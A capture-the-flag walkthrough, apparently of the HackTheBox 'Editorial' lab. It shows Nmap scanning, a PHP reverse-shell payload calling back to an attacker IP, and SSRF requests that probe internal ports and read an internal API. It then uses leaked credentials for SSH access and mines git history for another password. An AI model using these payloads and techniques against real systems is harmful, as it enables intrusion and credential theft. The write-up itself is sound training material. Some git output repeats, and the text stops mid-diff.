Editorial
Initial Enumeration
Nmap
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -n 10.10.11.20 -sV --script vuln
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-10-19 20:37 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Stats: 0:07:12 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.63% done; ETC: 20:45 (0:00:01 remaining)
Nmap scan report for 10.10.11.20
Host is up (0.16s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.9p1:
| 95499236-C9FE-56A6-9D7D-E943A24B633A 10.0 <https://vulners.com/githubexploit/95499236-C9FE-56A6-9D7D-E943A24B633A> *EXPLOIT*
| 2C119FFA-ECE0-5E14-A4A4-354A2C38071A 10.0 <https://vulners.com/githubexploit/2C119FFA-ECE0-5E14-A4A4-354A2C38071A> *EXPLOIT*
| CVE-2023-38408 9.8 <https://vulners.com/cve/CVE-2023-38408>
| CVE-2023-28531 9.8 <https://vulners.com/cve/CVE-2023-28531>
| B8190CDB-3EB9-5631-9828-8064A1575B23 9.8 <https://vulners.com/githubexploit/B8190CDB-3EB9-5631-9828-8064A1575B23> *EXPLOIT*
| 8FC9C5AB-3968-5F3C-825E-E8DB5379A623 9.8 <https://vulners.com/githubexploit/8FC9C5AB-3968-5F3C-825E-E8DB5379A623> *EXPLOIT*
| 8AD01159-548E-546E-AA87-2DE89F3927EC 9.8 <https://vulners.com/githubexploit/8AD01159-548E-546E-AA87-2DE89F3927EC> *EXPLOIT*
| 5E6968B4-DBD6-57FA-BF6E-D9B2219DB27A 9.8 <https://vulners.com/githubexploit/5E6968B4-DBD6-57FA-BF6E-D9B2219DB27A> *EXPLOIT*
| 33D623F7-98E0-5F75-80FA-81AA666D1340 9.8 <https://vulners.com/githubexploit/33D623F7-98E0-5F75-80FA-81AA666D1340> *EXPLOIT*
| PACKETSTORM:179290 8.1 <https://vulners.com/packetstorm/PACKETSTORM:179290> *EXPLOIT*
| FB2E9ED1-43D7-585C-A197-0D6628B20134 8.1 <https://vulners.com/githubexploit/FB2E9ED1-43D7-585C-A197-0D6628B20134> *EXPLOIT*
| FA3992CE-9C4C-5350-8134-177126E0BD3F 8.1 <https://vulners.com/githubexploit/FA3992CE-9C4C-5350-8134-177126E0BD3F> *EXPLOIT*
| F8981437-1287-5B69-93F1-657DFB1DCE59 8.1 <https://vulners.com/githubexploit/F8981437-1287-5B69-93F1-657DFB1DCE59> *EXPLOIT*
| F58A5CB2-2174-586F-9CA9-4C47F8F38B5E 8.1 <https://vulners.com/githubexploit/F58A5CB2-2174-586F-9CA9-4C47F8F38B5E> *EXPLOIT*
| EFD615F0-8F17-5471-AA83-0F491FD497AF 8.1 <https://vulners.com/githubexploit/EFD615F0-8F17-5471-AA83-0F491FD497AF> *EXPLOIT*
| EC20B9C2-6857-5848-848A-A9F430D13EEB 8.1 <https://vulners.com/githubexploit/EC20B9C2-6857-5848-848A-A9F430D13EEB> *EXPLOIT*
| EB13CBD6-BC93-5F14-A210-AC0B5A1D8572 8.1 <https://vulners.com/githubexploit/EB13CBD6-BC93-5F14-A210-AC0B5A1D8572> *EXPLOIT*
| E660E1AF-7A87-57E2-AEEF-CA14E1FEF7CD 8.1 <https://vulners.com/githubexploit/E660E1AF-7A87-57E2-AEEF-CA14E1FEF7CD> *EXPLOIT*
| E543E274-C20A-582A-8F8E-F8E3F381C345 8.1 <https://vulners.com/githubexploit/E543E274-C20A-582A-8F8E-F8E3F381C345> *EXPLOIT*
| E34FCCEC-226E-5A46-9B1C-BCD6EF7D3257 8.1 <https://vulners.com/githubexploit/E34FCCEC-226E-5A46-9B1C-BCD6EF7D3257> *EXPLOIT*
| E24EEC0A-40F7-5BBC-9E4D-7B13522FF915 8.1 <https://vulners.com/githubexploit/E24EEC0A-40F7-5BBC-9E4D-7B13522FF915> *EXPLOIT*
| DC798E98-BA77-5F86-9C16-0CF8CD540EBB 8.1 <https://vulners.com/githubexploit/DC798E98-BA77-5F86-9C16-0CF8CD540EBB> *EXPLOIT*
| DC473885-F54C-5F76-BAFD-0175E4A90C1D 8.1 <https://vulners.com/githubexploit/DC473885-F54C-5F76-BAFD-0175E4A90C1D> *EXPLOIT*
| D85F08E9-DB96-55E9-8DD2-22F01980F360 8.1 <https://vulners.com/githubexploit/D85F08E9-DB96-55E9-8DD2-22F01980F360> *EXPLOIT*
| D572250A-BE94-501D-90C4-14A6C9C0AC47 8.1 <https://vulners.com/githubexploit/D572250A-BE94-501D-90C4-14A6C9C0AC47> *EXPLOIT*
| D1E049F1-393E-552D-80D1-675022B26911 8.1 <https://vulners.com/githubexploit/D1E049F1-393E-552D-80D1-675022B26911> *EXPLOIT*
| CVE-2024-6387 8.1 <https://vulners.com/cve/CVE-2024-6387>
| CFEBF7AF-651A-5302-80B8-F8146D5B33A6 8.1 <https://vulners.com/githubexploit/CFEBF7AF-651A-5302-80B8-F8146D5B33A6> *EXPLOIT*
| CF80DDA9-42E7-5E06-8DA8-84C72658E191 8.1 <https://vulners.com/githubexploit/CF80DDA9-42E7-5E06-8DA8-84C72658E191> *EXPLOIT*
| CB2926E1-2355-5C82-A42A-D4F72F114F9B 8.1 <https://vulners.com/githubexploit/CB2926E1-2355-5C82-A42A-D4F72F114F9B> *EXPLOIT*
| C6FB6D50-F71D-5870-B671-D6A09A95627F 8.1 <https://vulners.com/githubexploit/C6FB6D50-F71D-5870-B671-D6A09A95627F> *EXPLOIT*
| C5B2D4A1-8C3B-5FF7-B620-EDE207B027A0 8.1 <https://vulners.com/githubexploit/C5B2D4A1-8C3B-5FF7-B620-EDE207B027A0> *EXPLOIT*
| C185263E-3E67-5550-B9C0-AB9C15351960 8.1 <https://vulners.com/githubexploit/C185263E-3E67-5550-B9C0-AB9C15351960> *EXPLOIT*
| BDA609DA-6936-50DC-A325-19FE2CC68562 8.1 <https://vulners.com/githubexploit/BDA609DA-6936-50DC-A325-19FE2CC68562> *EXPLOIT*
| AA539633-36A9-53BC-97E8-19BC0E4E8D37 8.1 <https://vulners.com/githubexploit/AA539633-36A9-53BC-97E8-19BC0E4E8D37> *EXPLOIT*
| A377249D-3C48-56C9-98D6-C47013B3A043 8.1 <https://vulners.com/githubexploit/A377249D-3C48-56C9-98D6-C47013B3A043> *EXPLOIT*
| 9CDFE38D-80E9-55D4-A7A8-D5C20821303E 8.1 <https://vulners.com/githubexploit/9CDFE38D-80E9-55D4-A7A8-D5C20821303E> *EXPLOIT*
| 9A6454E9-662A-5A75-8261-73F46290FC3C 8.1 <https://vulners.com/githubexploit/9A6454E9-662A-5A75-8261-73F46290FC3C> *EXPLOIT*
| 92254168-3B26-54C9-B9BE-B4B7563586B5 8.1 <https://vulners.com/githubexploit/92254168-3B26-54C9-B9BE-B4B7563586B5> *EXPLOIT*
| 91752937-D1C1-5913-A96F-72F8B8AB4280 8.1 <https://vulners.com/githubexploit/91752937-D1C1-5913-A96F-72F8B8AB4280> *EXPLOIT*
| 906CD901-3758-5F2C-8FA6-386BF9378AB3 8.1 <https://vulners.com/githubexploit/906CD901-3758-5F2C-8FA6-386BF9378AB3> *EXPLOIT*
| 896B5857-A9C8-5342-934A-74F1EA1934CF 8.1 <https://vulners.com/githubexploit/896B5857-A9C8-5342-934A-74F1EA1934CF> *EXPLOIT*
| 81F0C05A-8650-5DE8-97E9-0D89F1807E5D 8.1 <https://vulners.com/githubexploit/81F0C05A-8650-5DE8-97E9-0D89F1807E5D> *EXPLOIT*
| 7C7167AF-E780-5506-BEFA-02E5362E8E48 8.1 <https://vulners.com/githubexploit/7C7167AF-E780-5506-BEFA-02E5362E8E48> *EXPLOIT*
| 7AA8980D-D89F-57EB-BFD1-18ED3AB1A7DD 8.1 <https://vulners.com/githubexploit/7AA8980D-D89F-57EB-BFD1-18ED3AB1A7DD> *EXPLOIT*
| 79FE1ED7-EB3D-5978-A12E-AAB1FFECCCAC 8.1 <https://vulners.com/githubexploit/79FE1ED7-EB3D-5978-A12E-AAB1FFECCCAC> *EXPLOIT*
| 795762E3-BAB4-54C6-B677-83B0ACC2B163 8.1 <https://vulners.com/githubexploit/795762E3-BAB4-54C6-B677-83B0ACC2B163> *EXPLOIT*
| 77DAD6A9-8142-5591-8605-C5DADE4EE744 8.1 <https://vulners.com/githubexploit/77DAD6A9-8142-5591-8605-C5DADE4EE744> *EXPLOIT*
| 743E5025-3BB8-5EC4-AC44-2AA679730661 8.1 <https://vulners.com/githubexploit/743E5025-3BB8-5EC4-AC44-2AA679730661> *EXPLOIT*
| 73A19EF9-346D-5B2B-9792-05D9FE3414E2 8.1 <https://vulners.com/githubexploit/73A19EF9-346D-5B2B-9792-05D9FE3414E2> *EXPLOIT*
| 6FD8F914-B663-533D-8866-23313FD37804 8.1 <https://vulners.com/githubexploit/6FD8F914-B663-533D-8866-23313FD37804> *EXPLOIT*
| 6E81EAE5-2156-5ACB-9046-D792C7FAF698 8.1 <https://vulners.com/githubexploit/6E81EAE5-2156-5ACB-9046-D792C7FAF698> *EXPLOIT*
| 6B78D204-22B0-5D11-8A0C-6313958B473F 8.1 <https://vulners.com/githubexploit/6B78D204-22B0-5D11-8A0C-6313958B473F> *EXPLOIT*
| 649197A2-0224-5B5C-9C4E-B5791D42A9FB 8.1 <https://vulners.com/githubexploit/649197A2-0224-5B5C-9C4E-B5791D42A9FB> *EXPLOIT*
| 608FA50C-AEA1-5A83-8297-A15FC7D32A7C 8.1 <https://vulners.com/githubexploit/608FA50C-AEA1-5A83-8297-A15FC7D32A7C> *EXPLOIT*
| 5D2CB1F8-DC04-5545-8BC7-29EE3DA8890E 8.1 <https://vulners.com/githubexploit/5D2CB1F8-DC04-5545-8BC7-29EE3DA8890E> *EXPLOIT*
| 5C81C5C1-22D4-55B3-B843-5A9A60AAB6FD 8.1 <https://vulners.com/githubexploit/5C81C5C1-22D4-55B3-B843-5A9A60AAB6FD> *EXPLOIT*
| 56F97BB2-3DF6-5588-82AF-1D7B77F9AD45 8.1 <https://vulners.com/githubexploit/56F97BB2-3DF6-5588-82AF-1D7B77F9AD45> *EXPLOIT*
| 53BCD84F-BD22-5C9D-95B6-4B83627AB37F 8.1 <https://vulners.com/githubexploit/53BCD84F-BD22-5C9D-95B6-4B83627AB37F> *EXPLOIT*
| 535C5505-40BC-5D18-B346-1FDF036F0B08 8.1 <https://vulners.com/githubexploit/535C5505-40BC-5D18-B346-1FDF036F0B08> *EXPLOIT*
| 48603E8F-B170-57EE-85B9-67A7D9504891 8.1 <https://vulners.com/githubexploit/48603E8F-B170-57EE-85B9-67A7D9504891> *EXPLOIT*
| 4748B283-C2F6-5924-8241-342F98EEC2EE 8.1 <https://vulners.com/githubexploit/4748B283-C2F6-5924-8241-342F98EEC2EE> *EXPLOIT*
| 452ADB71-199C-561E-B949-FCDE6288B925 8.1 <https://vulners.com/githubexploit/452ADB71-199C-561E-B949-FCDE6288B925> *EXPLOIT*
| 418FD78F-82D2-5748-9EE9-CAFC34111864 8.1 <https://vulners.com/githubexploit/418FD78F-82D2-5748-9EE9-CAFC34111864> *EXPLOIT*
| 3D426DCE-96C7-5F01-B0AB-4B11C9557441 8.1 <https://vulners.com/githubexploit/3D426DCE-96C7-5F01-B0AB-4B11C9557441> *EXPLOIT*
| 31CC906F-9328-5944-B370-FBD98DF0DDD3 8.1 <https://vulners.com/githubexploit/31CC906F-9328-5944-B370-FBD98DF0DDD3> *EXPLOIT*
| 2FFB4379-2BD1-569F-9F38-1B6D272234C9 8.1 <https://vulners.com/githubexploit/2FFB4379-2BD1-569F-9F38-1B6D272234C9> *EXPLOIT*
| 1FFDA397-F480-5C74-90F3-060E1FE11B2E 8.1 <https://vulners.com/githubexploit/1FFDA397-F480-5C74-90F3-060E1FE11B2E> *EXPLOIT*
| 1F7A6000-9E6D-511C-B0F6-7CADB7200761 8.1 <https://vulners.com/githubexploit/1F7A6000-9E6D-511C-B0F6-7CADB7200761> *EXPLOIT*
| 1CF00BB8-B891-5347-A2DC-2C6A6BFF7C99 8.1 <https://vulners.com/githubexploit/1CF00BB8-B891-5347-A2DC-2C6A6BFF7C99> *EXPLOIT*
| 1AB9F1F4-9798-59A0-9213-1D907E81E7F6 8.1 <https://vulners.com/githubexploit/1AB9F1F4-9798-59A0-9213-1D907E81E7F6> *EXPLOIT*
| 1A779279-F527-5C29-A64D-94AAA4ADD6FD 8.1 <https://vulners.com/githubexploit/1A779279-F527-5C29-A64D-94AAA4ADD6FD> *EXPLOIT*
| 15C36683-070A-5CC1-B21F-5F0BF974D9D3 8.1 <https://vulners.com/githubexploit/15C36683-070A-5CC1-B21F-5F0BF974D9D3> *EXPLOIT*
| 1337DAY-ID-39674 8.1 <https://vulners.com/zdt/1337DAY-ID-39674> *EXPLOIT*
| 11F020AC-F907-5606-8805-0516E06160EE 8.1 <https://vulners.com/githubexploit/11F020AC-F907-5606-8805-0516E06160EE> *EXPLOIT*
| 108E1D25-1F7E-534C-97CD-3F6045E32B98 8.1 <https://vulners.com/githubexploit/108E1D25-1F7E-534C-97CD-3F6045E32B98> *EXPLOIT*
| 0FC4BE81-312B-51F4-9D9B-66D8B5C093CD 8.1 <https://vulners.com/githubexploit/0FC4BE81-312B-51F4-9D9B-66D8B5C093CD> *EXPLOIT*
| 0F9B3655-C7D4-55A9-8EB5-2EAD9CEAB180 8.1 <https://vulners.com/githubexploit/0F9B3655-C7D4-55A9-8EB5-2EAD9CEAB180> *EXPLOIT*
| 0E9294FD-6B44-503A-84C2-C6E76E53B0B7 8.1 <https://vulners.com/githubexploit/0E9294FD-6B44-503A-84C2-C6E76E53B0B7> *EXPLOIT*
| 0A8CA57C-ED38-5301-A03A-C841BD3082EC 8.1 <https://vulners.com/githubexploit/0A8CA57C-ED38-5301-A03A-C841BD3082EC> *EXPLOIT*
| SSV:92579 7.5 <https://vulners.com/seebug/SSV:92579> *EXPLOIT*
| PACKETSTORM:173661 7.5 <https://vulners.com/packetstorm/PACKETSTORM:173661> *EXPLOIT*
| F0979183-AE88-53B4-86CF-3AF0523F3807 7.5 <https://vulners.com/githubexploit/F0979183-AE88-53B4-86CF-3AF0523F3807> *EXPLOIT*
| 1337DAY-ID-26576 7.5 <https://vulners.com/zdt/1337DAY-ID-26576> *EXPLOIT*
| CVE-2023-51385 6.5 <https://vulners.com/cve/CVE-2023-51385>
| CVE-2023-48795 5.9 <https://vulners.com/cve/CVE-2023-48795>
| CVE-2023-51384 5.5 <https://vulners.com/cve/CVE-2023-51384>
| PACKETSTORM:140261 0.0 <https://vulners.com/packetstorm/PACKETSTORM:140261> *EXPLOIT*
| 5C971D4B-2DD3-5894-9EC2-DAB952B4740D 0.0 <https://vulners.com/githubexploit/5C971D4B-2DD3-5894-9EC2-DAB952B4740D> *EXPLOIT*
|_ 39E70D1A-F5D8-59D5-A0CF-E73D9BAA3118 0.0 <https://vulners.com/githubexploit/39E70D1A-F5D8-59D5-A0CF-E73D9BAA3118> *EXPLOIT*
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 470.08 secondsAfter running Nmap, we are able to identify 2 ports open, 22 as well as 80. Since we do not have any provided or valid credentials into the ssh service, we will have to first go into our http web service running nginx to see if we are able to identify any interesting information.
HTTP
Typing http://10.10.11.20:80 into our browser, we see that we are unable to connect into the webpage, but we are redirected to http://editorial.htb/. We will add that into our virtual hosts configuration list.
┌──(kali㉿kali)-[~]
└─$ sudo nano /etc/hosts
[sudo] password for kali:
┌──(kali㉿kali)-[~]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.11.20 editorial.htbWe can then navigate over into http://editorial.htb/. Browsing through the webpage, we are able to find a few things:
Home page: /
File upload: /upload
About: /about
Under
/about, we are able to see a potential user found under ‘Contact us’, with the email address ofsubmissions@tiempoarriba.htb
Initial Foothold
After some testing under the /upload page, we noted that it is possible to upload any type of file extension under the browse section and upload it into the webpage. We can attempt to gain a reverse shell with this upload functionality.
<?php
system('bash -i >& /dev/tcp/10.10.14.3/4444 0>&1');
?>However, after multiple testing, we realized that there is no way for the webpage to be able to call or execute our submitted payload. We will thus have to find alternative methods of gaining access into the system.
Server-Side Request Forgery
After playing around with the page for awhile, we can take note of the Cover URL input alongside with the preview button. If we run a listener on our attacking machine, and try to preview our own nc port, we are able to get a connection over.
┌──(kali㉿kali)-[~]
└─$ nc -nlvp 1337
listening on [any] 1337 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.20] 41486
GET / HTTP/1.1
Host: 10.10.14.3:1337
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-aliveWe can then attempt to see if we are able to do potential port scanning by accessing different ports on the internal 127.0.0.1 address, to check if there are any other services running on that the ports. This can be done with burpsuite's intruder tool:
POST /upload-cover HTTP/1.1
Host: editorial.htb
Content-Length: 302
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryr7zdsWPAyAqH1gOy
Accept: */*
Origin: <http://editorial.htb>
Referer: <http://editorial.htb/upload>
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
------WebKitFormBoundaryr7zdsWPAyAqH1gOy
Content-Disposition: form-data; name="bookurl"
<http://127.0.0.1>:§1§
------WebKitFormBoundaryr7zdsWPAyAqH1gOy
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryr7zdsWPAyAqH1gOy--From there, we will run a number list to test through the response for all 65535 ports.
After running the enumeration through all ports, we found that port 5000 is has a slightly different output, where it does not show a .jpeg in the response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 20 Oct 2024 02:30:14 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Content-Length: 51
static/uploads/3127e453-340d-4ecc-9101-2aac39e71f62We can then try and see what this is by going back to the webpage and requesting for it → opening image in new tab makes us download the file into our local machine.
┌──(kali㉿kali)-[~/Downloads]
└─$ cat 3db54403-6efc-44c5-a3bc-c022f227bd2e
{"messages":[{"promotions":{"description":"Retrieve a list of all the promotions in our library.","endpoint":"/api/latest/metadata/messages/promos","methods":"GET"}},{"coupons":{"description":"Retrieve the list of coupons to use in our library.","endpoint":"/api/latest/metadata/messages/coupons","methods":"GET"}},{"new_authors":{"description":"Retrieve the welcome message sended to our new authors.","endpoint":"/api/latest/metadata/messages/authors","methods":"GET"}},{"platform_use":{"description":"Retrieve examples of how to use the platform.","endpoint":"/api/latest/metadata/messages/how_to_use_platform","methods":"GET"}}],"version":[{"changelog":{"description":"Retrieve a list of all the versions and updates of the api.","endpoint":"/api/latest/metadata/changelog","methods":"GET"}},{"latest":{"description":"Retrieve the last version of api.","endpoint":"/api/latest/metadata","methods":"GET"}}]}From this document, we are able to see some interesting information - {"new_authors":{"description":"Retrieve the welcome message sended to our new authors.","endpoint":"/api/latest/metadata/messages/authors","methods":"GET"}}. We can get this document and see what is inside:
POST /upload-cover HTTP/1.1
Host: editorial.htb
Content-Length: 344
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypVrPzqlXXsXmEDXB
Accept: */*
Origin: <http://editorial.htb>
Referer: <http://editorial.htb/upload>
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
------WebKitFormBoundarypVrPzqlXXsXmEDXB
Content-Disposition: form-data; name="bookurl"
<http://127.0.0.1:5000/api/latest/metadata/messages/authors>
------WebKitFormBoundarypVrPzqlXXsXmEDXB
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarypVrPzqlXXsXmEDXB--**REQUEST
GET /static/uploads/816baf68-b1a3-4f6f-95f6-7d04e098cd5d HTTP/1.1
Host: editorial.htb
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: <http://editorial.htb/upload>
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
RESPONSE**
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 20 Oct 2024 02:35:31 GMT
Content-Type: application/octet-stream
Content-Length: 506
Connection: keep-alive
Content-Disposition: inline; filename=816baf68-b1a3-4f6f-95f6-7d04e098cd5d
Last-Modified: Sun, 20 Oct 2024 02:35:31 GMT
Cache-Control: no-cache
ETag: "1729391731.6434903-506-4150728885"
{"template_mail_message":"Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\\n\\nYour login credentials for our internal forum and authors site are:\\nUsername: dev\\nPassword: dev080217_devAPI!@\\nPlease be sure to change your password as soon as possible for security purposes.\\n\\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\\n\\nBest regards, Editorial Tiempo Arriba Team."}From the template_mail_message, we are able to identify a set of credentials:
Username: dev
Password: dev080217_devAPI!@From there, we can try a few things:
Logging in directly with provided credentials
Username enumeration for users whom has yet to change password
┌──(kali㉿kali)-[~/Downloads]
└─$ ssh dev@10.10.11.20
The authenticity of host '10.10.11.20 (10.10.11.20)' can't be established.
ED25519 key fingerprint is SHA256:YR+ibhVYSWNLe4xyiPA0g45F4p1pNAcQ7+xupfIR70Q.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.20' (ED25519) to the list of known hosts.
dev@10.10.11.20's password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-112-generic x86_64)
* Documentation: <https://help.ubuntu.com>
* Management: <https://landscape.canonical.com>
* Support: <https://ubuntu.com/pro>
System information as of Sun Oct 20 02:41:39 AM UTC 2024
System load: 0.0
Usage of /: 60.7% of 6.35GB
Memory usage: 13%
Swap usage: 0%
Processes: 225
Users logged in: 0
IPv4 address for eth0: 10.10.11.20
IPv6 address for eth0: dead:beef::250:56ff:fe94:65f7
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See <https://ubuntu.com/esm> or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Mon Jun 10 09:11:03 2024 from 10.10.14.52
dev@editorial:~$ ls -la
total 32
drwxr-x--- 4 dev dev 4096 Jun 5 14:36 .
drwxr-xr-x 4 root root 4096 Jun 5 14:36 ..
drwxrwxr-x 3 dev dev 4096 Jun 5 14:36 apps
lrwxrwxrwx 1 root root 9 Feb 6 2023 .bash_history -> /dev/null
-rw-r--r-- 1 dev dev 220 Jan 6 2022 .bash_logout
-rw-r--r-- 1 dev dev 3771 Jan 6 2022 .bashrc
drwx------ 2 dev dev 4096 Jun 5 14:36 .cache
-rw-r--r-- 1 dev dev 807 Jan 6 2022 .profile
-rw-r----- 1 root dev 33 Oct 18 05:45 user.txt
dev@editorial:~$ cat user.txt
f090d1bf7fabafbb3bcecd8b4192e184
dev@editorial:~$ sudo -l
[sudo] password for dev:
Sorry, user dev may not run sudo on editorial.Luckily, we are able to directly log in with the credentials provided. We will then get the first flag, user.txt. Trying our luck but we are not able to sudo -l with this user.
f090d1bf7fabafbb3bcecd8b4192e184
Lateral Movement
dev@editorial:~/apps$ git log
commit 8ad0f3187e2bda88bba85074635ea942974587e8 (HEAD -> master)
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date: Sun Apr 30 21:04:21 2023 -0500
fix: bugfix in api port endpoint
commit dfef9f20e57d730b7d71967582035925d57ad883
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date: Sun Apr 30 21:01:11 2023 -0500
change: remove debug and update api port
commit b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date: Sun Apr 30 20:55:08 2023 -0500
change(api): downgrading prod to dev
* To use development environment.
commit 1e84a036b2f33c59e2390730699a488c65643d28
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date: Sun Apr 30 20:51:10 2023 -0500
feat: create api to editorial info
* It (will) contains internal info about the editorial, this enable
faster access to information.
commit 3251ec9e8ffdd9b938e83e3b9fbf5fd1efa9bbb8
...skipping...
Date: Sun Apr 30 21:04:21 2023 -0500
fix: bugfix in api port endpoint
commit dfef9f20e57d730b7d71967582035925d57ad883
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date: Sun Apr 30 21:01:11 2023 -0500
change: remove debug and update api port
commit b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date: Sun Apr 30 20:55:08 2023 -0500
change(api): downgrading prod to dev
* To use development environment.
commit 1e84a036b2f33c59e2390730699a488c65643d28
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date: Sun Apr 30 20:51:10 2023 -0500
feat: create api to editorial info
* It (will) contains internal info about the editorial, this enable
faster access to information.
commit 3251ec9e8ffdd9b938e83e3b9fbf5fd1efa9bbb8
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date: Sun Apr 30 20:48:43 2023 -0500
feat: create editorial app
* This contains the base of this project.
* Also we add a feature to enable to external authors send us their
books and validate a future post in our editorial.Looking through our user’s folder, we are able to find some information regarding some endpoint in a ./git folder. One of the more interesting logs shown is this change (api): downgrading prod to dev log, in which we will dig deeper into.
dev@editorial:~/apps$ git show b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
commit b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date: Sun Apr 30 20:55:08 2023 -0500
change(api): downgrading prod to dev
* To use development environment.
diff --git a/app_api/app.py b/app_api/app.py
index 61b786f..3373b14 100644
--- a/app_api/app.py
+++ b/app_api/app.py
@@ -64,7 +64,7 @@ def index():
@app.route(api_route + '/authors/message', methods=['GET'])
def api_mail_new_authors():
return jsonify({
- 'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\\n\\nYour login credentials for our internal forum and authors site are:\\nUsername: prod\\nPassword: 080217_Producti0n_2023!@\\nPlease be sure to change your password as soon as possible for security purposes.\\n\\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\\n\\nBest regards, " + api_editorial_name + " Team."
+ 'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\\n\\nYour login credentials for our internal forum and authors site are:\\nUsername: dev\\nPassword: dev080217_devAPI!@\\nPlease be sure to change your password as soon as possible for security purposes.\\n\\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\\n\\nBest regards, " + api_editorial_name + " Team."
}) # TODO: replace dev credentials when checks pass
# -------------------------------
change(api): downgrading prod to dev
* To use development environment.
diff --git a/app_api/app.py b/app_api/app.py
index 61b786f..3373b14 100644
--- a/app_api/app.py
+++ b/app_api/app.py
@@ -64,7 +64,7 @@ def index():
@app.route(api_route + '/authors/message', methods=['GET'])
def api_mail_new_authors():
return jsonify({
- 'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\\n\\nYour login credentials for our internal forum and authors site are:\\nUsername: prod\\nPassword: 080217_Producti0n_2023!@\\nPlease be sure to change your password as soon as possible for security purposes.\\n\\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\\n\\nBest regards, " + api_editorial_name + " Team."
+ 'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\\n\\nYour login credentials for our internal forum and authors site are:\\nUsername: dev\\nPassword: dev080217_devAPI!@\\nPlease be sure to change your password as soon as possible for security purposes.\\n\\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\\n\\nBest regards, " + api_editorial_name + " Team."
}) # TODO: replace dev credentials when checks pass
# -------------------------------
change(api): downgrading prod to dev
* To use development environment.
diff --git a/app_api/app.py b/app_api/app.py
index 61b786f..3373b14 100644
--- a/app_api/app.py
+++ b/app_api/app.py
@@ -64,7 +64,7 @@ def index():
@app.route(api_route + '/authors/message', methods=['GET'])
def api_mail_new_authors():
return jsonify({
